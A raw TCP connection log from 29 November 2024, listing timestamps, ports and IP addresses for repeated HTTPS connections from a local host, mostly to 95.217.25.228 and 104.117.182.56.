Nov 29, 2024 12:28:22.114073992 CET	49844	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:22.114110947 CET	443	49844	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:22.114315033 CET	443	49845	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:22.114391088 CET	49845	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:22.124172926 CET	49773	443	192.168.2.8	2.16.158.35
Nov 29, 2024 12:28:22.124212980 CET	443	49773	2.16.158.35	192.168.2.8
Nov 29, 2024 12:28:22.124547005 CET	49847	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:22.124588966 CET	443	49847	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:22.124663115 CET	49847	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:22.124864101 CET	49847	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:22.124882936 CET	443	49847	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:22.137454987 CET	49845	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:22.137478113 CET	443	49845	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:22.163125992 CET	49845	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:22.163132906 CET	443	49845	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:22.163172007 CET	49845	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:22.163177967 CET	443	49845	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:23.166470051 CET	443	49846	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:23.166606903 CET	49846	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:23.167334080 CET	49846	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:23.167346954 CET	443	49846	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:23.187676907 CET	49846	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:23.187690973 CET	443	49846	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:23.187720060 CET	49846	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:23.187727928 CET	443	49846	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:23.235132933 CET	443	49845	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:23.235220909 CET	443	49845	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:23.235483885 CET	49845	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:23.236598969 CET	49845	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:23.236619949 CET	443	49845	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:23.428989887 CET	443	49847	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:23.429393053 CET	49847	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:23.429413080 CET	443	49847	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:23.429691076 CET	443	49847	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:23.430010080 CET	49847	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:23.430056095 CET	443	49847	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:23.430237055 CET	49847	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:23.471326113 CET	443	49847	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:23.724266052 CET	49848	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:23.724327087 CET	443	49848	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:23.724420071 CET	49848	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:23.724761009 CET	49848	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:23.724772930 CET	443	49848	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:23.894515038 CET	443	49847	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:23.894543886 CET	443	49847	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:23.894613028 CET	443	49847	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:23.894685030 CET	49847	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:23.896611929 CET	49847	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:23.896611929 CET	49847	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:23.903382063 CET	49849	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:23.903419971 CET	443	49849	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:23.903513908 CET	49849	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:23.903748035 CET	49849	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:23.903767109 CET	443	49849	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:24.206274986 CET	49847	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:24.206315041 CET	443	49847	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:24.301911116 CET	443	49846	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:24.302004099 CET	443	49846	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:24.302030087 CET	49846	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:24.302058935 CET	49846	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:24.302994013 CET	49846	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:24.303014040 CET	443	49846	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:24.731139898 CET	49850	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:24.731182098 CET	443	49850	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:24.731252909 CET	49850	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:24.731460094 CET	49850	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:24.731468916 CET	443	49850	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:25.160286903 CET	443	49849	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:25.183356047 CET	49849	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:25.183377981 CET	443	49849	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:25.183801889 CET	443	49849	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:25.185542107 CET	49849	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:25.185604095 CET	443	49849	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:25.185781002 CET	49849	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:25.231333017 CET	443	49849	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:25.238218069 CET	443	49848	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:25.238295078 CET	49848	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:25.239196062 CET	49848	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:25.239206076 CET	443	49848	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:25.256726980 CET	49848	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:25.256733894 CET	443	49848	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:25.256766081 CET	49848	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:25.256776094 CET	443	49848	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:25.615982056 CET	443	49849	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:25.616014004 CET	443	49849	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:25.616097927 CET	443	49849	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:25.616223097 CET	49849	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:25.616223097 CET	49849	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:25.617502928 CET	49849	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:25.617525101 CET	443	49849	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:25.623158932 CET	49851	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:25.623188019 CET	443	49851	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:25.623277903 CET	49851	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:25.623480082 CET	49851	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:25.623496056 CET	443	49851	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:25.850553036 CET	443	49800	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:25.850632906 CET	443	49800	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:25.850698948 CET	49800	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:26.198656082 CET	443	49850	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:26.198793888 CET	49850	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:26.199933052 CET	49850	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:26.199943066 CET	443	49850	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:26.217279911 CET	49850	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:26.217279911 CET	49850	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:26.217287064 CET	443	49850	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:26.217298985 CET	443	49850	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:26.277061939 CET	443	49801	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:26.277138948 CET	443	49801	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:26.277210951 CET	49801	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:26.368624926 CET	443	49848	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:26.368700981 CET	443	49848	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:26.368732929 CET	49848	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:26.368818045 CET	49848	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:26.369677067 CET	49848	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:26.369694948 CET	443	49848	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:26.756242990 CET	49852	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:26.756299019 CET	443	49852	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:26.756385088 CET	49852	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:26.756598949 CET	49852	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:26.756609917 CET	443	49852	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:26.835921049 CET	443	49851	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:26.836226940 CET	49851	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:26.836251974 CET	443	49851	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:26.837074995 CET	443	49851	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:26.837434053 CET	49851	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:26.837584972 CET	49851	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:26.837589025 CET	443	49851	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:26.837622881 CET	443	49851	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:26.879237890 CET	49851	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:27.271800041 CET	443	49851	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:27.271852970 CET	443	49851	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:27.271915913 CET	443	49851	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:27.271977901 CET	49851	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:27.272011042 CET	49851	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:27.273715019 CET	49851	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:27.273737907 CET	443	49851	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:27.325474024 CET	443	49850	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:27.325562954 CET	443	49850	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:27.325664043 CET	49850	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:27.326782942 CET	49850	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:27.326798916 CET	443	49850	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:27.762764931 CET	49853	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:27.762818098 CET	443	49853	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:27.762887955 CET	49853	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:27.763114929 CET	49853	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:27.763129950 CET	443	49853	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:28.182631016 CET	443	49852	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:28.182862043 CET	49852	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:28.183440924 CET	49852	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:28.183469057 CET	443	49852	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:28.202837944 CET	49852	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:28.202837944 CET	49852	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:28.202848911 CET	443	49852	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:28.202867031 CET	443	49852	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:29.278069973 CET	443	49853	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:29.278208017 CET	49853	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:29.278824091 CET	49853	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:29.278834105 CET	443	49853	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:29.293849945 CET	443	49852	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:29.293916941 CET	49852	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:29.293935061 CET	443	49852	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:29.293948889 CET	443	49852	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:29.293978930 CET	49852	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:29.294001102 CET	49852	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:29.295203924 CET	49852	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:29.295221090 CET	443	49852	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:29.300853968 CET	49853	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:29.300877094 CET	443	49853	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:29.300899029 CET	49853	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:29.300909996 CET	443	49853	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:29.786407948 CET	49854	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:29.786447048 CET	443	49854	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:29.786550045 CET	49854	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:29.786842108 CET	49854	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:29.786859035 CET	443	49854	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:29.810563087 CET	443	49821	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:29.810667992 CET	443	49821	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:29.810767889 CET	49821	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:29.936500072 CET	443	49822	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:29.936587095 CET	443	49822	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:29.936695099 CET	49822	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:30.415903091 CET	443	49853	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:30.415958881 CET	49853	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:30.415977955 CET	443	49853	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:30.416023016 CET	49853	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:30.417105913 CET	49853	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:30.417131901 CET	443	49853	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:30.794040918 CET	49855	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:30.794099092 CET	443	49855	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:30.794178009 CET	49855	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:30.794523954 CET	49855	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:30.794538021 CET	443	49855	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:31.253129959 CET	443	49854	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:31.253243923 CET	49854	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:31.253895044 CET	49854	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:31.253910065 CET	443	49854	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:31.272995949 CET	49854	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:31.273004055 CET	443	49854	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:31.273022890 CET	49854	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:31.273034096 CET	443	49854	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:32.264596939 CET	443	49855	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:32.264697075 CET	49855	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:32.265304089 CET	49855	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:32.265314102 CET	443	49855	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:32.286115885 CET	49855	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:32.286132097 CET	443	49855	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:32.286150932 CET	49855	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:32.286159039 CET	443	49855	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:32.377167940 CET	443	49854	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:32.377255917 CET	443	49854	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:32.377279043 CET	49854	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:32.377314091 CET	49854	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:32.378388882 CET	49854	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:32.378420115 CET	443	49854	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:32.817478895 CET	49856	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:32.817532063 CET	443	49856	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:32.817626953 CET	49856	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:32.817882061 CET	49856	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:32.817893982 CET	443	49856	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:33.387568951 CET	443	49855	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:33.387649059 CET	443	49855	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:33.387665987 CET	49855	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:33.387697935 CET	49855	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:33.388576031 CET	49855	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:33.388597012 CET	443	49855	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:33.836810112 CET	49857	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:33.836858034 CET	443	49857	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:33.836957932 CET	49857	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:33.837182999 CET	49857	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:33.837194920 CET	443	49857	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:34.284696102 CET	443	49856	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:34.284919977 CET	49856	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:34.285306931 CET	49856	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:34.285312891 CET	443	49856	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:34.303708076 CET	49856	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:34.303718090 CET	443	49856	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:34.303807974 CET	49856	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:34.303813934 CET	443	49856	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:35.382145882 CET	443	49857	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:35.382240057 CET	49857	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:35.382813931 CET	49857	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:35.382819891 CET	443	49857	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:35.403908968 CET	49857	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:35.403914928 CET	443	49857	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:35.403954983 CET	49857	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:35.403960943 CET	443	49857	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:35.417721987 CET	443	49856	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:35.417788982 CET	443	49856	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:35.417790890 CET	49856	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:35.417833090 CET	49856	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:35.418620110 CET	49856	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:35.418636084 CET	443	49856	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:35.865982056 CET	49858	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:35.866050959 CET	443	49858	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:35.866132021 CET	49858	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:35.866449118 CET	49858	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:35.866461992 CET	443	49858	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:36.490746021 CET	443	49857	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:36.490807056 CET	443	49857	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:36.490848064 CET	49857	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:36.490881920 CET	49857	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:36.491880894 CET	49857	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:36.491899014 CET	443	49857	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:36.885884047 CET	49859	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:36.885926008 CET	443	49859	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:36.885984898 CET	49859	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:36.886253119 CET	49859	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:36.886265993 CET	443	49859	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:37.332520962 CET	443	49858	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:37.332593918 CET	49858	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:37.333178997 CET	49858	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:37.333184004 CET	443	49858	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:37.352174044 CET	49858	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:37.352180958 CET	443	49858	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:37.352215052 CET	49858	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:37.352219105 CET	443	49858	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:38.353404999 CET	443	49859	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:38.353538036 CET	49859	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:38.354063034 CET	49859	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:38.354073048 CET	443	49859	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:38.374141932 CET	49859	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:38.374155998 CET	443	49859	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:38.374214888 CET	49859	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:38.374222994 CET	443	49859	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:38.446765900 CET	443	49858	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:38.446844101 CET	443	49858	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:38.446907997 CET	49858	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:38.446968079 CET	49858	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:38.448066950 CET	49858	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:38.448085070 CET	443	49858	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:38.897497892 CET	49860	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:38.897533894 CET	443	49860	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:38.897667885 CET	49860	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:38.898138046 CET	49860	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:38.898163080 CET	443	49860	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:39.486166954 CET	443	49859	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:39.486236095 CET	443	49859	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:39.486315966 CET	49859	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:39.486362934 CET	49859	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:39.487659931 CET	49859	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:39.487685919 CET	443	49859	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:39.920279026 CET	49861	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:39.920325041 CET	443	49861	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:39.920444012 CET	49861	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:39.920625925 CET	49861	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:39.920641899 CET	443	49861	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:40.364869118 CET	443	49860	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:40.365005970 CET	49860	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:40.365540028 CET	49860	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:40.365567923 CET	443	49860	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:40.385864973 CET	49860	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:40.385881901 CET	443	49860	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:40.385895967 CET	49860	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:40.385902882 CET	443	49860	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:41.385684967 CET	443	49861	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:41.385823011 CET	49861	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:41.386351109 CET	49861	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:41.386363029 CET	443	49861	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:41.415218115 CET	49861	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:41.415218115 CET	49861	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:41.415231943 CET	443	49861	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:41.415251970 CET	443	49861	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:41.486032963 CET	443	49860	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:41.486112118 CET	443	49860	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:41.486257076 CET	49860	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:41.487396002 CET	49860	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:41.487417936 CET	443	49860	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:41.942897081 CET	49862	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:41.942969084 CET	443	49862	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:41.943104982 CET	49862	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:41.943442106 CET	49862	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:41.943459034 CET	443	49862	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:42.517637968 CET	443	49861	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:42.517721891 CET	443	49861	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:42.517816067 CET	49861	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:42.517816067 CET	49861	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:42.519335985 CET	49861	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:42.519371033 CET	443	49861	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:42.963624954 CET	49863	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:42.963665962 CET	443	49863	95.217.25.228	192.168.2.8
